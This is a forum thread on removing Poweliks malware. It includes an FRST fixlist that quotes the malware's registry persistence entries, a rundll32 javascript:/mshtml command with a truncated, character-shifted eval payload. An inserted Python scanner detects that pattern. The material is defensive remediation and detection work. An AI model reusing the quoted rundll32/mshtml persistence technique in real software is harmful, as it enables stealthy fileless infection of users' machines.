Yesterday I started getting warnings from Avast blocking webpages (I was not online, I was in a game with no browser open). Avast seemed to block everything, but when I checked my task manager I saw several dllhost.exe*32 COM Surrogates. I was able to end their tasks but 5-10 minutes later they started up again. (I was not using the computer this weekend and when I came back Sunday the first thing I did was launch a game and TeamSpeak 3, so I am not sure what caused this.) Avast and MBAM have not seemed to have a problem blocking anything today.
The process being blocked is SysWOW64\dllhost.exe. I saw others post this same thing happening to them yesterday, so something must have happened at the same time.
Quick update, the COM Surrogates come every 5 minutes like clockwork, MBAM still blocking all of it but I need to close the surrogates myself in task manager. Anyone able to help?
CAUTION: This fix is only valid for this specific machine; using it on another may break your computer.
Open notepad and copy/paste the text in the quotebox below into it:
HKU\S-1-5-21-1977768418-3833106981-970839474-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Toolbar: HKLM - No Name - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File
CustomCLSID: HKU\S-1-5-21-1977768418-3833106981-970839474-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
EmptyTemp:
CMD: bitsadmin /reset /allusers
Save this as fixlist.txt, in the same location as FRST.exe
Run FRST and press Fix
On completion a log will be generated; please post that.
WARNING: Java is the #1 exploited program at this time. The Department of Homeland Security recommends that computer users disable Java.
See this article
I would recommend that you completely uninstall Java unless you need it to run important software.
In that instance I would recommend that you disable Java in your browsers until you need it for that software and then enable it. (See How to disable Java in your web browser and How to unplug Java from the browser)
Now that you are clean, to help protect your computer in the future I recommend that you get the following free programmes:
CryptoPrevent: install this programme to lock down and prevent crypto ransomware.
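An added example, not part of any post in this thread and not FRST's own code: a Python scanner for FRST-style log lines that flags the kind of LocalServer32 entry the fixlist above removes (a COM registration whose command is rundll32 with a javascript: URL through mshtml) and undoes the one-character shift on the visible part of the eval() argument. The function names, the placeholder SID and the benign control line are assumptions made for the example.

```python
import re

# A COM LocalServer32 value should name an executable on disk. The fixlist
# entries instead launch rundll32 with a javascript: pseudo-URL via mshtml.
PATTERN = re.compile(
    r"(?P<key>\S*\\localserver32)\s*(?::|->)\s*"
    r"(?P<cmd>rundll32(?:\.exe)?\s+javascript:.*?mshtml,RunHTMLApplication.*)",
    re.IGNORECASE,
)
EVAL_ARG = re.compile(r'eval\("(\S+)')


def unshift(text):
    """Undo the one-character shift seen on the eval() argument in the thread."""
    return "".join(chr(ord(c) - 1) for c in text)


def scan(lines):
    """Return one finding per log line that matches the persistence pattern."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = PATTERN.search(line)
        if not match:
            continue
        arg = EVAL_ARG.search(match.group("cmd"))
        findings.append({
            "line": number,
            "key": match.group("key"),
            "decoded_prefix": unshift(arg.group(1)) if arg else None,
        })
    return findings


# Constructed sample modelled on the log lines quoted in the thread
# (placeholder SID; the first CLSID entry is a benign made-up control).
SAMPLE = [
    r"CustomCLSID: HKU\S-1-5-21-0-0-0-1000_Classes\CLSID\{00000000-0000-0000-0000-000000000001}\localserver32 -> C:\Program Files\Example\app.exe",
    r"Toolbar: HKLM - No Name - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File",
    r'CustomCLSID: HKU\S-1-5-21-0-0-0-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters).',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Only the third sample line is reported; the ordinary LocalServer32 path and the empty toolbar entry are left alone, and the decoded prefix shows why the entry is script rather than a file path.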
I wasn’t sure if I should start a new post or what, so I figured I’d reply in this thread.
I started having the same issues within the last day or so on my system. I noticed I was slowing down some and having random weird issues (screen flashing, what seemed to be small window popups while in games).
This morning after booting up my system, it seemed to be slow in opening web pages. I checked my processes and noticed multiple dllhost.exe*32 COMSurrogate processes on my system, using large amounts of memory.
I have never noticed any processes like this before.
I ran AVAST a couple of days ago and it seemed to catch several Trojans and quarantine them, so I thought I was free of any more problems. Then this started yesterday.
I downloaded FRST and ran it to generate logs. I will attach them here.
I would appreciate any help that you may be able to give.